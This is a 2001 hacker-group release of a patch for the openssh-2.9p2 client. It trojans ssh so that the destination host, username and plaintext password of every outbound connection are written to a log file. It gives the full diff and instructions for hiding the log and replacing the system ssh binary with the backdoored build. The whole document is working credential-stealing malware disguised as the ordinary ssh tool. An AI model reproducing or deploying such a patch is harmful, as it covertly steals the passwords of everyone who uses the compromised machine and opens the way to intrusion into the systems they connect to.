Openssh-2.9p2 patch which logs the username, remote host, and password when outbound connections are made.
54ff25e46677231b2fc92927a45b716aa7cffc530903b1efb79922544c1dcd02
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[Ministry-Of-Peace] - openssh-2.9p2 snoop patch - 07th Sept 2001
== (c)oded 2001 Digital Shadow ==
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
Code Description:
-----------------
This is a patch for openssh-2.9p2 that will enable logging of the
username, password and target system address whenever anyone uses
ssh. The details are grabbed and logged before they are encrypted.
Usage:
------
The code currently logs to /tmp/ssh.log - it is highly advised that
you modify this to somewhere a little less obvious.
To apply the patch, copy it into the directory where openssh-2.9p2
is and type: patch -p1 < ssh-2.3.0-patch
Then all you need to do is compile it, and use a utility such as
fix to replace the old ssh with the new version.
Code:
-----
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
diff -N -c -r openssh-2.9p2/ssh.c openssh-2.9p2-new/ssh.c
*** openssh-2.9p2/ssh.c Tue Apr 17 14:14:35 2001
--- openssh-2.9p2-new/ssh.c Tue Nov 27 05:56:01 2001
***************
*** 249,254 ****
--- 249,255 ----
struct passwd *pw;
int dummy;
uid_t original_effective_uid;
+ FILE *lg;
__progname = get_progname(av[0]);
init_rng();
***************
*** 716,721 ****
--- 717,727 ----
tilde_expand_filename(options.user_hostfile2, original_real_uid);
/* Log into the remote system. This never returns if the login fails. */
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Host: %s\n", host);
+ fprintf(lg, "User: %s\n", options.user);
+ fclose(lg);
+
ssh_login(sensitive_data.keys, sensitive_data.nkeys,
host, (struct sockaddr *)&hostaddr, pw);
diff -N -c -r openssh-2.9p2/sshconnect.c openssh-2.9p2-new/sshconnect.c
*** openssh-2.9p2/sshconnect.c Thu Apr 12 19:34:36 2001
--- openssh-2.9p2-new/sshconnect.c Tue Nov 27 05:56:01 2001
***************
*** 775,785 ****
--- 775,790 ----
{
int size;
char *padded;
+ FILE *lg;
if (datafellows & SSH_BUG_PASSWORDPAD) {
packet_put_string(password, strlen(password));
return;
}
+
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
size = roundup(strlen(password) + 1, 32);
padded = xmalloc(size);
memset(padded, 0, size);
diff -N -c -r openssh-2.9p2/sshconnect2.c openssh-2.9p2-new/sshconnect2.c
*** openssh-2.9p2/sshconnect2.c Thu Apr 19 16:40:46 2001
--- openssh-2.9p2-new/sshconnect2.c Tue Nov 27 05:56:01 2001
***************
*** 441,446 ****
--- 441,447 ----
static int attempt = 0;
char prompt[80];
char *password;
+ FILE *lg;
if (attempt++ >= options.number_of_password_prompts)
return 0;
***************
*** 457,462 ****
--- 458,466 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
memset(password, 0, strlen(password));
xfree(password);
packet_inject_ignore(64);
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
code[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --